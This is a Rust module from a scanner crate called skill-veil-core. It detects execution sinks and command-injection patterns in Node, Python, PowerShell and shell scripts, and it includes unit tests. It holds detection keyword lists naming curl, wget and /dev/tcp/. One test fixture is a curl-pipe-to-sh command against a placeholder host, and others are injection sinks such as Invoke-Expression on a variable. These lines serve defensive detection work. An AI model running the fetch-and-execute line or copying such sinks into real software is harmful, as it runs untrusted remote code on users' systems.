skill-veil-core 0.1.3

//! Detectors covering execution sinks: process spawn, dynamic eval,
//! shell side-effects, and language-specific command-injection regexes.

use crate::findings::{
    ArtifactKind, EvidenceKind, Finding, MatchTarget, RecommendedAction, Severity, ThreatCategory,
};

use super::match_helpers::original_match_str;
use super::patterns::{
    NODE_INJECTION_PATTERNS, POWERSHELL_INJECTION_PATTERNS, PYTHON_INJECTION_PATTERNS,
    SHELL_INJECTION_PATTERNS,
};

pub(crate) fn detect_node_process_exec(
    content_lower: &str,
    language: &str,
    artifact_path: &str,
) -> Vec<Finding> {
    if !matches!(language, "js" | "ts" | "mjs" | "cjs" | "mts" | "cts")
        || !(content_lower.contains("child_process")
            || content_lower.contains("exec(")
            || content_lower.contains("spawn("))
    {
        return Vec::new();
    }
    // Indicators paired with `child_process` / `exec(` / `spawn(` that
    // escalate `SCRIPT_NODE_PROCESS_EXEC` from Severity::Low/Log to
    // Severity::Medium/Block. Each entry MUST carry an explicit boundary
    // (trailing space, embedded `:`, or `.exe`) or be a unique multi-word
    // phrase — bare interpreter names like `"bash"` or `"sh"` would match
    // common identifiers (`bashConfig`, `bashly`, `// bash compatibility`,
    // `flash`, `crash`, `push`, `stash`) and silently flip the qualitative
    // finding state on weak evidence. Shell interpreter names (`bash`, `sh`,
    // `powershell`, `pwsh`, `zsh`, `ksh`, `fish`) use the same word-boundary
    // logic as `line_invokes_shell_or_interpreter` to avoid identifier FPs.
    const RISKY_INDICATORS: &[&str] = &[
        "curl ",
        "wget ",
        "http://",
        "https://",
        "powershell",
        "cmd.exe",
        "invoke-webrequest",
    ];
    let risky_indicator = RISKY_INDICATORS
        .iter()
        .find(|needle| content_lower.contains(**needle))
        .copied()
        .or_else(|| {
            // Shell interpreter tokens require word-boundary matching to
            // avoid substring false positives (e.g. `flash`, `crash`, `push`
            // all end in `sh` + space). Reuse the same basename logic as
            // `line_invokes_shell_or_interpreter` for consistency.
            static SHELL_NAMES: &[&str] = &[
                "bash", "sh", "dash", "zsh", "ksh", "fish", "csh", "tcsh", "pwsh",
            ];
            content_lower.lines().find_map(|line| {
                line.split_whitespace().find_map(|token| {
                    let basename = token.rsplit(['/', '\\']).next().unwrap_or(token);
                    let mut lower = basename.to_ascii_lowercase();
                    if lower.ends_with(".exe") {
                        lower.truncate(lower.len() - 4);
                    }
                    SHELL_NAMES.iter().find(|&&name| name == lower).copied()
                })
            })
        });
    let risky_process_exec = risky_indicator.is_some();
    vec![
        Finding::builder("SCRIPT_NODE_PROCESS_EXEC", ThreatCategory::RemoteExec)
            .severity(if risky_process_exec {
                Severity::Medium
            } else {
                Severity::Low
            })
            .action(if risky_process_exec {
                RecommendedAction::Block
            } else {
                RecommendedAction::Log
            })
            .evidence_kind(if risky_process_exec {
                EvidenceKind::Behavior
            } else {
                EvidenceKind::Context
            })
            .matched_on(MatchTarget::ReferencedFile {
                path: artifact_path.to_string(),
            })
            .artifact(
                ArtifactKind::ReferencedArtifact,
                Some(artifact_path.to_string()),
            )
            .match_value(risky_indicator.unwrap_or("child_process"))
            .reason(if risky_process_exec {
                "Node script spawns subprocesses with shell or network execution semantics"
            } else {
                "Node script spawns local subprocesses"
            })
            .build(),
    ]
}

pub(crate) fn detect_python_exec_network(
    content_lower: &str,
    language: &str,
    artifact_path: &str,
) -> Vec<Finding> {
    if language != "py" {
        return Vec::new();
    }
    let has_exec = content_lower.contains("subprocess.")
        || content_lower.contains("os.system(")
        || content_lower.contains("os.popen(")
        || content_lower.contains("os.execvp(")
        || content_lower.contains("os.execvpe(");
    let has_network = content_lower.contains("requests.")
        || content_lower.contains("urllib.request")
        || content_lower.contains("urlopen(")
        || content_lower.contains("httpx.");
    if has_exec && has_network {
        vec![
            Finding::builder("SCRIPT_PYTHON_EXEC_NETWORK", ThreatCategory::RemoteExec)
                .severity(Severity::Medium)
                .action(RecommendedAction::RequireApproval)
                .evidence_kind(EvidenceKind::Behavior)
                .matched_on(MatchTarget::ReferencedFile {
                    path: artifact_path.to_string(),
                })
                .artifact(
                    ArtifactKind::ReferencedArtifact,
                    Some(artifact_path.to_string()),
                )
                .match_value("subprocess+network")
                .reason("Python script combines execution and network primitives")
                .build(),
        ]
    } else if has_exec {
        vec![
            Finding::builder("SCRIPT_PYTHON_EXEC", ThreatCategory::RemoteExec)
                .severity(Severity::Low)
                .action(RecommendedAction::Log)
                .evidence_kind(EvidenceKind::Context)
                .matched_on(MatchTarget::ReferencedFile {
                    path: artifact_path.to_string(),
                })
                .artifact(
                    ArtifactKind::ReferencedArtifact,
                    Some(artifact_path.to_string()),
                )
                .match_value("subprocess")
                .reason("Python script uses execution primitives")
                .build(),
        ]
    } else {
        Vec::new()
    }
}

pub(crate) fn detect_powershell_dynamic_exec(
    content_lower: &str,
    language: &str,
    artifact_path: &str,
) -> Vec<Finding> {
    if !matches!(language, "ps1" | "psm1" | "psd1")
        || !(content_lower.contains("start-process")
            || content_lower.contains("invoke-expression")
            || content_lower.contains("iex ")
            || content_lower.contains("iex("))
    {
        return Vec::new();
    }
    vec![
        Finding::builder("SCRIPT_POWERSHELL_EXEC", ThreatCategory::RemoteExec)
            .severity(Severity::High)
            .action(RecommendedAction::RequireApproval)
            .evidence_kind(EvidenceKind::Behavior)
            .matched_on(MatchTarget::ReferencedFile {
                path: artifact_path.to_string(),
            })
            .artifact(
                ArtifactKind::ReferencedArtifact,
                Some(artifact_path.to_string()),
            )
            .match_value("Start-Process/IEX")
            .reason("PowerShell script executes commands dynamically")
            .build(),
    ]
}

pub(crate) fn detect_shell_side_effects(
    content_lower: &str,
    language: &str,
    artifact_path: &str,
) -> Vec<Finding> {
    if !matches!(language, "sh" | "bash" | "zsh" | "ksh" | "fish")
        || !(content_lower.contains("chmod +x")
            || content_lower.contains("nohup ")
            || content_lower.contains("/dev/tcp/"))
    {
        return Vec::new();
    }
    vec![Finding::builder(
        "SCRIPT_SHELL_INSTALL_SIDE_EFFECT",
        ThreatCategory::SupplyChain,
    )
    .severity(Severity::Low)
    .action(RecommendedAction::Log)
    .evidence_kind(EvidenceKind::Context)
    .matched_on(MatchTarget::ReferencedFile {
        path: artifact_path.to_string(),
    })
    .artifact(
        ArtifactKind::ReferencedArtifact,
        Some(artifact_path.to_string()),
    )
    .match_value("shell side effects")
    .reason("Shell script changes execution mode or runs detached install-time commands")
    .build()]
}

pub(crate) fn detect_injection_patterns(
    lower: &str,
    original: &str,
    language: &str,
    artifact_path: &str,
) -> Vec<Finding> {
    let patterns: &[(&str, crate::ports::CompiledPattern)] = match language {
        "sh" | "bash" | "zsh" | "ksh" | "fish" => &SHELL_INJECTION_PATTERNS,
        "py" => &PYTHON_INJECTION_PATTERNS,
        "js" | "ts" | "mjs" | "cjs" | "mts" | "cts" => &NODE_INJECTION_PATTERNS,
        "ps1" | "psm1" | "psd1" => &POWERSHELL_INJECTION_PATTERNS,
        _ => &[],
    };
    let mut findings = Vec::new();
    for (rule_id, regex) in patterns {
        for matched in regex.find_matches(lower) {
            let evidence = original_match_str(original, lower, &matched);
            findings.push(
                Finding::builder(*rule_id, ThreatCategory::RemoteExec)
                    .severity(Severity::High)
                    .action(RecommendedAction::RequireApproval)
                    .evidence_kind(EvidenceKind::Behavior)
                    .matched_on(MatchTarget::ReferencedFile {
                        path: artifact_path.to_string(),
                    })
                    .artifact(ArtifactKind::ReferencedArtifact, Some(artifact_path.to_string()))
                    .match_value(evidence)
                    .reason("Script contains an execution sink that appears to be influenced by variable or user-controlled input")
                    .build(),
            );
        }
    }
    findings
}

#[cfg(test)]
mod tests {
    use super::*;

    /// Contract: a JS file that mentions `bash` or `sh` only as part of an
    /// identifier or unbroken token (`bashConfig`, `bashly`, `flash`, `crash`,
    /// `push`, `stash`) MUST NOT escalate `SCRIPT_NODE_PROCESS_EXEC` from
    /// Severity::Low / Action::Log to Severity::Medium / Action::Block.
    /// Pre-fix the `RISKY_INDICATORS` list contained bare `"bash "` and
    /// `"sh "`, so common identifiers and English words would flip the
    /// qualitative finding state on weak evidence. The fix uses
    /// word-boundary matching (same logic as `line_invokes_shell_or_interpreter`)
    /// so `flash`, `crash`, `push`, `stash` no longer match.
    ///
    /// This guards the identifier vector specifically; the substring
    /// detector cannot disambiguate English prose like `// bash
    /// compatibility` (with a literal space after `bash`), and that
    /// remains a known limitation of the substring approach.
    #[test]
    fn detect_node_process_exec_keeps_severity_low_for_bare_bash_identifier() {
        let content = "const { exec } = require('child_process');\n\
                       const bashConfig = require('./bashlib.js');\n\
                       exec('echo hi');\n";
        let lower = content.to_ascii_lowercase();
        let findings = detect_node_process_exec(&lower, "js", "/tmp/script.js");
        assert_eq!(findings.len(), 1);
        assert_eq!(
            findings[0].severity,
            Severity::Low,
            "`bashConfig` / `bashlib` identifiers must NOT escalate severity \
             (bare `bash` token vector); got {:?}",
            findings[0].severity,
        );
        assert_eq!(findings[0].recommended_action, RecommendedAction::Log);
    }

    /// Contract: identifiers ending in `sh` followed by a space (`flash `,
    /// `crash `, `push `, `stash `) MUST NOT escalate. Pre-fix `"sh "`
    /// matched all of these, flipping Severity::Low to Medium.
    #[test]
    fn detect_node_process_exec_keeps_severity_low_for_sh_substring_identifiers() {
        for word in ["flash", "crash", "push", "stash", "trash", "slash", "hash"] {
            let content = format!("const {{ exec }} = require('child_process');\nconst x = {word}();\nexec('echo hi');\n");
            let lower = content.to_ascii_lowercase();
            let findings = detect_node_process_exec(&lower, "js", "/tmp/script.js");
            assert_eq!(findings.len(), 1);
            assert_eq!(
                findings[0].severity,
                Severity::Low,
                "`{word}` identifier must NOT escalate severity; got {:?}",
                findings[0].severity,
            );
        }
    }

    /// Contract: a real `bash -c "..."` invocation still escalates
    /// severity to Medium and action to Block. Anchors that the
    /// boundary-tightened `"bash "` pattern catches the genuine
    /// risky case.
    #[test]
    fn detect_node_process_exec_escalates_for_real_bash_invocation() {
        let content = "const { exec } = require('child_process');\n\
                       exec('bash -c \"curl http://x.example | sh\"');\n";
        let lower = content.to_ascii_lowercase();
        let findings = detect_node_process_exec(&lower, "js", "/tmp/script.js");
        assert_eq!(findings.len(), 1);
        assert_eq!(findings[0].severity, Severity::Medium);
        assert_eq!(findings[0].recommended_action, RecommendedAction::Block);
    }

    /// Contract: PowerShell `Invoke-Expression` followed by a `$variable`
    /// raises `COMMAND_INJECTION_SINK_POWERSHELL` regardless of the
    /// argument-binding shape. Pre-fix the regex required `\s+` between
    /// the cmdlet and the variable, so `Invoke-Expression($cmd)` and
    /// `iex($cmd)` (paren binding, the most common evasion shape) and
    /// `Invoke-Expression "$cmd"` (string-quoted binding) all silently
    /// failed to match. Each of these is a positive case the new regex
    /// must accept.
    #[test]
    fn detect_injection_patterns_powershell_accepts_paren_quote_and_alias() {
        let positives = [
            ("$x = 'Get-Process'\nInvoke-Expression $x\n", "space"),
            ("$x = 'Get-Process'\nInvoke-Expression($x)\n", "paren"),
            ("$x = 'Get-Process'\niex($x)\n", "alias paren"),
            ("$x = 'Get-Process'\niex $x\n", "alias space"),
            (
                "$x = 'Get-Process'\nInvoke-Expression \"$x\"\n",
                "double-quote",
            ),
            (
                "$x = 'Get-Process'\nInvoke-Expression '$x'\n",
                "single-quote",
            ),
        ];
        for (script, label) in positives {
            let lower = script.to_ascii_lowercase();
            let findings = detect_injection_patterns(&lower, script, "ps1", "/tmp/x.ps1");
            assert!(
                findings
                    .iter()
                    .any(|f| f.rule_id == "COMMAND_INJECTION_SINK_POWERSHELL"),
                "{label}: must raise COMMAND_INJECTION_SINK_POWERSHELL for {script:?}; got {findings:?}",
            );
        }
    }

    /// Contract: the PowerShell injection regex MUST NOT fire on
    /// substrings of unrelated identifiers (`apex`, `complex`, `vertex`,
    /// `Invoke-Expression-Helper-Comment`-shaped log lines). Without
    /// `\b` word-boundaries the relaxed pattern would over-fire on
    /// `apex $x` or `complex$x`.
    #[test]
    fn detect_injection_patterns_powershell_does_not_overmatch_substrings() {
        let negatives = [
            "$apex = 1\napex $other\n",       // identifier ending with `iex`-like
            "$x = 1\ncomplex $x\n",           // word containing `iex` substring
            "Write-Host 'iex documentation'", // string literal mention only
        ];
        for script in negatives {
            let lower = script.to_ascii_lowercase();
            let findings = detect_injection_patterns(&lower, script, "ps1", "/tmp/x.ps1");
            assert!(
                findings
                    .iter()
                    .all(|f| f.rule_id != "COMMAND_INJECTION_SINK_POWERSHELL"),
                "must NOT raise COMMAND_INJECTION_SINK_POWERSHELL for {script:?}; got {findings:?}",
            );
        }
    }

    /// Contract: `detect_shell_side_effects` MUST fire on KornShell (`.ksh`)
    /// and Fish (`.fish`) scripts. Pre-fix only `sh | bash | zsh` were
    /// accepted, so a `.ksh` script with `chmod +x` or `/dev/tcp/` and a
    /// `.fish` script with `nohup ` escaped detection entirely.
    #[test]
    fn detect_shell_side_effects_fires_for_ksh_and_fish() {
        let content = "chmod +x ./payload\n";
        let lower = content.to_ascii_lowercase();
        for lang in ["sh", "bash", "zsh", "ksh", "fish"] {
            let findings = detect_shell_side_effects(&lower, lang, "/tmp/install.sh");
            assert!(
                !findings.is_empty(),
                "{lang}: detect_shell_side_effects must fire on chmod +x; got {findings:?}",
            );
        }
    }

    /// Contract: `detect_shell_side_effects` MUST NOT fire for non-shell
    /// languages (e.g. Python, Node). Negative-side regression so the
    /// broadened language set doesn't over-match.
    #[test]
    fn detect_shell_side_effects_does_not_fire_for_non_shell() {
        let content = "chmod +x ./payload\n";
        let lower = content.to_ascii_lowercase();
        for lang in ["py", "js", "ts", "rb", "pl"] {
            let findings = detect_shell_side_effects(&lower, lang, "/tmp/install.sh");
            assert!(
                findings.is_empty(),
                "{lang}: detect_shell_side_effects must NOT fire for non-shell language; got {findings:?}",
            );
        }
    }

    /// Contract: `detect_powershell_dynamic_exec` MUST fire on `.psm1`
    /// (PowerShell module) and `.psd1` (PowerShell data) files. Pre-fix
    /// only `"ps1"` was accepted, so a `.psm1` module with `Invoke-Expression`
    /// escaped detection entirely.
    #[test]
    fn detect_powershell_dynamic_exec_fires_for_psm1_and_psd1() {
        let content = "Invoke-Expression($cmd)\n";
        let lower = content.to_ascii_lowercase();
        for lang in ["ps1", "psm1", "psd1"] {
            let findings = detect_powershell_dynamic_exec(&lower, lang, "/tmp/mod.psm1");
            assert!(
                !findings.is_empty(),
                "{lang}: detect_powershell_dynamic_exec must fire on Invoke-Expression; got {findings:?}",
            );
        }
    }

    /// Contract: `detect_injection_patterns` MUST route KornShell and Fish
    /// scripts to the shell injection patterns. Pre-fix only `sh | bash | zsh`
    /// were accepted.
    #[test]
    fn detect_injection_patterns_routes_ksh_and_fish_to_shell_patterns() {
        let content = "bash -c \"$USER_CMD\"\n";
        let lower = content.to_ascii_lowercase();
        for lang in ["sh", "bash", "zsh", "ksh", "fish"] {
            let findings = detect_injection_patterns(&lower, content, lang, "/tmp/x.sh");
            assert!(
                findings
                    .iter()
                    .any(|f| f.rule_id.starts_with("COMMAND_INJECTION_SINK_SHELL")),
                "{lang}: injection patterns must fire for shell language; got {findings:?}",
            );
        }
    }

    /// Contract: `detect_injection_patterns` MUST route `.psm1` and `.psd1`
    /// to the PowerShell injection patterns. Pre-fix only `"ps1"` was accepted.
    #[test]
    fn detect_injection_patterns_routes_psm1_to_powershell_patterns() {
        let content = "Invoke-Expression($cmd)\n";
        let lower = content.to_ascii_lowercase();
        for lang in ["ps1", "psm1", "psd1"] {
            let findings = detect_injection_patterns(&lower, content, lang, "/tmp/x.psm1");
            assert!(
                findings
                    .iter()
                    .any(|f| f.rule_id == "COMMAND_INJECTION_SINK_POWERSHELL"),
                "{lang}: PowerShell injection patterns must fire; got {findings:?}",
            );
        }
    }
}